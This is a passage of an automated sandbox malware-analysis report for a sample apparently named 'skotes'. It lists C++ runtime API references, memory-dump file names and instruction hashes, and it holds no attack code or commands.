                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00ACE879
                                                                                                                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 00ACE8AD
                                                                                                                                                                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00ACE8B5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1924466884-0
                                                                                                                                                                                                                                                                • Opcode ID: bd37a336fbcc996982f582afbaf77722234fd0d2dc767014261fcd3601676944
                                                                                                                                                                                                                                                                • Instruction ID: c7d70f516a2c69933273d5a9d7aabef9fa12f86416a775c530955f5d2d7035d4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd37a336fbcc996982f582afbaf77722234fd0d2dc767014261fcd3601676944
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41F775A00205DFCB05EFA4C495BADBBB5FF48310F1A80A9DD499B382DB34A941CFA1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00AB6ED1
                                                                                                                                                                                                                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00AB6F22
                                                                                                                                                                                                                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00AB6F32
                                                                                                                                                                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00AB6FD5
                                                                                                                                                                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00AB70DB
                                                                                                                                                                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00AB7116
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1997747980-0
                                                                                                                                                                                                                                                                • Opcode ID: 0d90f4fb4f97c01292bb2aec5de985c76e7ccef78af1e3cee137255f31265bd1
                                                                                                                                                                                                                                                                • Instruction ID: c807ce847fbe79480b7bb5aeab00f084de9fa60a9f896e77225da3ffc40b9d57
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d90f4fb4f97c01292bb2aec5de985c76e7ccef78af1e3cee137255f31265bd1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AC1DF719043489BDF20DFB4D945BEEBBF8AF45310F00452EE81697693EB75A908CB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00AC4538
                                                                                                                                                                                                                                                                • ListArray.LIBCONCRT ref: 00AC456C
                                                                                                                                                                                                                                                                • Hash.LIBCMT ref: 00AC45D5
                                                                                                                                                                                                                                                                • Hash.LIBCMT ref: 00AC45E5
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC9C41: std::bad_exception::bad_exception.LIBCMT ref: 00AC9C63
                                                                                                                                                                                                                                                                • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00AC474B
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00AC47A4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3010677857-0
                                                                                                                                                                                                                                                                • Opcode ID: b309182407dc3788ba6bbd3710de5b66b5291c320833f641825e8d3d03df5170
                                                                                                                                                                                                                                                                • Instruction ID: 45c4aa27ac1efee9118884616f18fe5ab409b9f422531696fef31bec9dbb0336
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b309182407dc3788ba6bbd3710de5b66b5291c320833f641825e8d3d03df5170
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3816EB0A11B52BED708DF74C955BD9FBA8BF09704F11421EF42897281DBB4A620CBD1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _SpinWait.LIBCONCRT ref: 00ABEEBC
                                                                                                                                                                                                                                                                • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00ABEEC8
                                                                                                                                                                                                                                                                • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00ABEEE1
                                                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00ABEF0F
                                                                                                                                                                                                                                                                • Concurrency::Context::Block.LIBCONCRT ref: 00ABEF31
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
